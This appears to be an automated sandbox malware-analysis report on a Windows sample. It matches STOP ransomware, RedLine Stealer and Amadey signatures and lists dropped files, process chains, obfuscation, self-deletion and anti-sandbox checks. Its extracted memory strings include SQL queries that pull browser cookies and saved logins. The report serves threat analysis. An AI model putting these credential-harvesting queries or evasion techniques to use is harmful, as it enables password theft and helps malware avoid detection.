Source: 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.405852892.0000000000758000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000000.532065497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: ECFD.exe PID: 5920, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0040E958 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: String function: 0040E958 appears 36 times
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: String function: 0040E958 appears 36 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040156B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402241 NtQuerySystemInformation, 0_2_00402241
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040224D NtQuerySystemInformation, 0_2_0040224D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402251 NtQuerySystemInformation, 0_2_00402251
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401577
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402219 NtQuerySystemInformation, 0_2_00402219
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040221B NtQuerySystemInformation, 0_2_0040221B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401727 NtMapViewOfSection,NtMapViewOfSection, 0_2_00401727
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401581 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401581
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401584 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401584
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401587
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_004015EF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_004015EF
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_0040160A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_0040160A
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_0040160E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_0040160E
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_0040161D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_0040161D
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_004015FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_004015FB
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_0040158A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_0040158A
PE file contains executable resources (Code or Archives)
Source: file.exe Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: F4FD.exe.1.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: 857.exe.1.dr Static PE information: Resource name: RT_VERSION type: VAX COFF executable, sections 52, created Sat Mar 7 05:34:56 1970, not stripped, version 79
Source: 3804.exe.1.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: udgatra.1.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: tfgatra.1.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: A28F.exe.1.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_EXPORT size: 0x100 address: 0x0
Source: 9763.exe.1.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_EXPORT size: 0x100 address: 0x0
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\tfgatra Jump to behavior
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@26/25@55/12
Source: C:\Users\user\AppData\Local\Temp\857.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\tfgatra C:\Users\user\AppData\Roaming\tfgatra
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\ECFD.exe C:\Users\user\AppData\Local\Temp\ECFD.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\F4FD.exe C:\Users\user\AppData\Local\Temp\F4FD.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\857.exe C:\Users\user\AppData\Local\Temp\857.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\2A57.exe C:\Users\user\AppData\Local\Temp\2A57.exe
Source: C:\Users\user\AppData\Local\Temp\ECFD.exe Process created: C:\Users\user\AppData\Local\Temp\ECFD.exe C:\Users\user\AppData\Local\Temp\ECFD.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3804.exe C:\Users\user\AppData\Local\Temp\3804.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\543.exe C:\Users\user\AppData\Local\Temp\543.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\EAA.exe C:\Users\user\AppData\Local\Temp\EAA.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\3804.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 812 -s 520
Source: C:\Users\user\AppData\Local\Temp\543.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 532
Source: unknown Process created: C:\Users\user\AppData\Roaming\udgatra C:\Users\user\AppData\Roaming\udgatra
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\ECFD.exe C:\Users\user\AppData\Local\Temp\ECFD.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\F4FD.exe C:\Users\user\AppData\Local\Temp\F4FD.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\857.exe C:\Users\user\AppData\Local\Temp\857.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\2A57.exe C:\Users\user\AppData\Local\Temp\2A57.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3804.exe C:\Users\user\AppData\Local\Temp\3804.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\543.exe C:\Users\user\AppData\Local\Temp\543.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\EAA.exe C:\Users\user\AppData\Local\Temp\EAA.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ECFD.exe Process created: C:\Users\user\AppData\Local\Temp\ECFD.exe C:\Users\user\AppData\Local\Temp\ECFD.exe Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\EB37.tmp Jump to behavior
Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 2A57.exe, 00000008.00000002.623701529.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.644742519.0000000002410000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;
Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: EAA.exe, 0000000C.00000003.530577101.0000000000651000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT origin_url,action_url,username_element,username_value,password_element,hex(password_value) password_value,submit_element,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,display_name,icon_url,federation_url,skip_zero_click,generation_upload_status,possible_username_pairs,id,date_last_used,moving_blocked_for FROM logins;
Source: EAA.exe, 0000000C.00000003.530577101.0000000000651000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT origin_url,action_url,username_element,username_value,password_element,hex(password_value) password_value,submit_element,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,display_name,icon_url,federation_url,skip_zero_click,generation_upload_status,possible_username_pairs,id,date_last_used,moving_blocked_for FROM logins;_value,s
Source: 2A57.exe, 00000008.00000003.506766086.0000000000851000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000003.526693551.0000000002479000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_007CCC8D CreateToolhelp32Snapshot,Module32First, 6_2_007CCC8D
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess812
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4500
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2A57.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2A57.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EAA.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EAA.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: ECFD.exe, 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\dobixuyapuxez\cohimu_88 jekumuhe\67.pdb source: F4FD.exe, 00000006.00000000.449000017.0000000000401000.00000020.00000001.01000000.00000008.sdmp, udgatra, 00000015.00000002.602489552.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, udgatra, 00000015.00000000.543137145.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
Source: Binary string: C:\topefife94\vafivesobuvo12\nugotelosowos\jiwewoha.pdb source: file.exe
Source: Binary string: #+C:\dobixuyapuxez\cohimu_88 jekumuhe\67.pdb source: F4FD.exe, 00000006.00000000.449000017.0000000000401000.00000020.00000001.01000000.00000008.sdmp, udgatra, 00000015.00000002.602489552.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, udgatra, 00000015.00000000.543137145.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
Source: Binary string: .C:\topefife94\vafivesobuvo12\nugotelosowos\jiwewoha.pdb source: file.exe
Source: Binary string: ]C:\setupipayadewu\gala\muhoci-yileyowip71.pdb source: ECFD.exe, 00000005.00000000.443846038.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe, 00000009.00000000.486986085.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe.1.dr
Source: Binary string: C:\feyiguha\pelejitahuhufe14 gewofaj.pdb source: 543.exe, 0000000B.00000000.489003730.0000000000401000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: ECFD.exe, 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\setupipayadewu\gala\muhoci-yileyowip71.pdb source: ECFD.exe, 00000005.00000000.443846038.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe, 00000009.00000000.486986085.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe.1.dr
Source: Binary string: MC:\ziradevetu84\faduxusiyipa29\jigi.pdb( source: 3804.exe, 0000000A.00000000.485964331.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: CC:\feyiguha\pelejitahuhufe14 gewofaj.pdb source: 543.exe, 0000000B.00000000.489003730.0000000000401000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: C:\ziradevetu84\faduxusiyipa29\jigi.pdb source: 3804.exe, 0000000A.00000000.485964331.0000000000401000.00000020.00000001.01000000.0000000B.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\tfgatra Unpacked PE file: 4.2.tfgatra.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Unpacked PE file: 6.2.F4FD.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409834 push eax; ret 0_2_00409852
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E99D push ecx; ret 0_2_0040E9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040B243 push ecx; ret 0_2_0040B256
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00601890 push cs; retf 0_2_0060189C
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_00401829 push cs; retf 4_2_00401835
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_00409834 push eax; ret 4_2_00409852
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_0040E99D push ecx; ret 4_2_0040E9B0
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_0040B243 push ecx; ret 4_2_0040B256
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_00409834 push eax; ret 6_2_00409852
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_0040E99D push ecx; ret 6_2_0040E9B0
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_0040B243 push ecx; ret 6_2_0040B256
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_007D2937 push 0000002Ch; retf 6_2_007D2939
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_007D1E17 push eax; ret 6_2_007D1E18
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_007D2785 pushad ; iretd 6_2_007D2786
PE file contains sections with non-standard names
Source: EAA.exe.1.dr Static PE information: section name: _RDATA
Source: EAA.exe.1.dr Static PE information: section name: .vmp0
Source: EAA.exe.1.dr Static PE information: section name: .vmp1
Source: 2A57.exe.1.dr Static PE information: section name: _RDATA
Source: 2A57.exe.1.dr Static PE information: section name: .vmp0
Source: 2A57.exe.1.dr Static PE information: section name: .vmp1
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .vmp1

Persistence and Installation Behavior
barindex
Yara detected Amadey bot
Source: Yara match File source: dump.pcap, type: PCAP
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\udgatra Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\tfgatra Jump to dropped file
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\udgatra Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\857.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\2A57.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\ECFD.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\EB37.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\EAA.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\F4FD.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\tfgatra Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3804.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\9763.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\B03C.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\543.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\A28F.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\file.exe Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\tfgatra:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\udgatra:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: F4FD.exe, 00000006.00000002.523107816.00000000007D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK
Tries to detect virtualization through RDTSC time measurements
